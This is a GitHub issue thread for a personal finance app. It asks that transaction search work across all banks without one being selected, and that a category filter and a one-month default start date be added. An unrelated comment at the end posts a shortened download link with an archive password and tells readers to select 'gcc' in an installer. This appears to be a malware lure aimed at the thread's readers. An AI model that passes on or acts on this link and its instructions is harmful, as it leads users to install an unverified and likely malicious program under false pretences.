### ISSUE TITLE
improve transactions browser

### ISSUE THREAD

**Issue by xcarol** [xcarol/wmm#72]
Enable search of transactions from multiple banks
Actual behaviour:
at transactions view the calendar range components and button search are disabled if no bank is selected

Wanted behaviour:
enable this three components and even when no bank is selected, this enables the search of transactions of all banks.

Add a category selection option to transactions browser

set start date to 1 month ago as much

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
